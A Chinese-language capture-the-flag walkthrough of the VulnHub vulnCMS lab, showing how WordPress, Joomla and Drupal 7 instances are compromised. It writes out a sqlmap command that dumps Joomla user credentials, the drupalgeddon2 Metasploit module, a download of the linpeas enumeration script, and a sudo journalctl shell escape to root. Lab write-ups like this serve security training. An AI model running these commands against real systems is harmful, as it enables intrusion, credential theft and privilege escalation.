NO.7 vulnCMS 靶场

admin 2024年11月12日20:18:47评论6 views字数 1201阅读4分0秒阅读模式

NO.7 vulnCMS 靶场

01.靶场介绍

This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag.  

正如它的名字所暗示的那样,这个盒子是关于CMS的。你需要枚举盒子,找到CMS,并利用它来访问其他内容,最终获得用户和根标志。

下载链接:https://www.vulnhub.com/entry/vulncms-1,710/

02.信息收集

信息收集都是常规操作了,这里就简单记录了。

主机发现

NO.7 vulnCMS 靶场

端口扫描

结果一出来就已经很明显这个主题了,cms 利用了。三个cms分别为 wordpress,joomla,drupal7

NO.7 vulnCMS 靶场

指纹识别

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

目录扫描

这里目录扫描就路过了,直接验证下几个cms 的漏洞吧。

NO.7 vulnCMS 靶场

漏洞扫描

这里用nuclei和nikto 工具扫描一下

wordpress 发现 WebShell 一个,可直接获取权限。

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

这还有个CVE-2017-5487 用户枚举漏洞。

NO.7 vulnCMS 靶场

joomla 发现存在一个sql 注入漏洞

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

直接上sqlmap 注入账号密码,但是密码没解密出来,就先放着吧。

sqlmap -u "http://192.168.43.132:8081/
index.php?item_id=1&list[ordering]&list
[select]=1&option=com_contenthistory&
type_id=1&view=history" -p list[select]
 -D joomla_db -T hs23w_users -C 
"username,password,email" --dump

NO.7 vulnCMS 靶场

第三个cms Drupal 明显也是存在漏洞的,搜索结果如下:

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

试了几个模块,如下一个可以直接使用:

exploit/unix/webapp/drupal_drupalgeddon2

NO.7 vulnCMS 靶场

03.获取权限

这里使用msf 获取的权限进行操作,但是权限过低。

NO.7 vulnCMS 靶场

这里下载一个linpeas 进行信息收集

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

NO.7 vulnCMS 靶场

这里可以看到好几个密码,其中一个是 tyrell 账号的密码

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

使用账号密码成功登录typell 账号。

NO.7 vulnCMS 靶场

04.权限提升

登录 tyrell 账号后,发现可以利用 journalctl 进行 sudo 提取

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

sudo journalctl
!/bin/sh

提权后可以看到 root.txt。

NO.7 vulnCMS 靶场

通过 root 账号也可以看到elliot 用户下的 user.txt 了,但是这个入口肯定是之前漏了。

NO.7 vulnCMS 靶场

收集了一下账号密码做了字典,才发现刚才joomlacms注入漏洞的 email 字段是个密码

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

NO.7 vulnCMS 靶场

到此就结束啦。

End

NO.7 vulnCMS 靶场

原文始发于微信公众号(贝雷帽SEC):NO.7 vulnCMS 靶场

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月12日20:18:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NO.7 vulnCMS 靶场http://cn-sec.com/archives/1823292.html

发表评论

匿名网友 填写信息